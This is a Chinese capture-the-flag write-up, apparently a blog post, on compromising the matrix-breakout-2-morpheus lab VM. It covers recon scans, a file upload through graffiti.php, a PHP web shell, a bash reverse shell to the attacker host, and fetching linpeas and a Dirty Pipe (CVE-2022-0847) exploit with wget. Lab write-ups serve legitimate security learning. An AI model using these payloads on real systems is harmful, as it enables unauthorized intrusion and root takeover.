【matrix-breakout-2-morpheus】靶场记录

一、信息收集

命令:netdiscover -i eth0 -r 192.168.236.0/24
在这里插入图片描述
访问网页,没有发现任何信息
在这里插入图片描述
命令:nmap -sV -T4 -A 192.168.236.151

发现开放22、80端口
22端口:ssh密码爆破
80端口:网页(没有信息)
81端口:自定义端口号
尝试一些弱口令未进入
在这里插入图片描述

命令:dirb http://192.168.236.151/

在这里插入图片描述
http://192.168.236.151/robots.txt 没有发现任何信息

在这里插入图片描述

http://192.168.236.151/javascript/jquery/jquery 也没有发现任何信息
在这里插入图片描述

再使用更厉害的目录扫描工具:gobuster
命令:gobuster dir -u http://192.168.1.35 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.txt,.html,.zip
在这里插入图片描述
访问:http://192.168.236.151/graffiti.php
在这里插入图片描述
访问:http://192.168.236.151/graffiti.txt 没有其他信息
在这里插入图片描述

二、 渗透测试

针对http://192.168.236.151/graffiti.php
发现上传什么,就会保存为为什么
在这里插入图片描述

第一种方法:上传一句话木马,并用蚁剑连接

在这里插入图片描述
在这里插入图片描述
message为一句话木马的url编码,这里我们利用burp抓包修改为attack.php上传:
在这里插入图片描述

上传成功,利用蚁剑连接,url:http://192.168.236.151/attack.php 密码:attack
在这里插入图片描述

连接成功
在这里插入图片描述
打开蚁剑中的终端:低权限
在这里插入图片描述

第二种方法:上传反弹shell语句,利用kali监听

命令:<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.236.128/4444 0>&1'"); ?>

在这里插入图片描述
这里在网页中上传反弹shell命令,另存为fuck.php
在这里插入图片描述

kali监听4444端口,网页访问:http://192.168.236.151/fuck.php
在这里插入图片描述

监听成功,但是低权限
在这里插入图片描述

三、提权

这里使用一种新的工具,可在内网中扫描内网主机的信息,包括IP,存在的漏洞等敏感信息
linux提权脚本:linpeas
枚举linux操作系统几乎所有的可提权项
首先下载至kali机:利用wget命令进行下载
利用wget

kali机开启http服务:python3 -m http.server 8080

在这里插入图片描述
在被攻击机中利用wget下载:
命令:wget http://192.168.236.128:8080/linpeas_linux_amd64

在这里插入图片描述
下载成功
在这里插入图片描述

先赋权,再执行:
命令:chmod +x linpeas_linux_amd64
命令:./linpeas_linux_amd64

在这里插入图片描述扫描信息包括可能存在的漏洞,系统版本,网卡信息等

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

这里使用: CVE-2022-0847进行提权
首先下载:命令:git clone https://github.com/imfiver/CVE-2022-0847.git
在这里插入图片描述

被攻击机利用wget,下载kali上的可执行文件:
命令:wget http://192.168.236.128:8080/CVE-2022-0847/Dirty-Pipe.sh
在这里插入图片描述
下载成功

先赋权,再执行Dirty-Pipe.sh
在这里插入图片描述

在这里插入图片描述
提权成功

四、总结

1、除了dirb扫描目录,还要学会gobuster ffuf工具进行强力的目录扫描
ffuf扫描:ffuf -u http://IP/FUZZ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -c -ic -e .txt,.zip,.php,html
2、linux内网强力扫描工具:linpeas工具的使用

  • 2
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值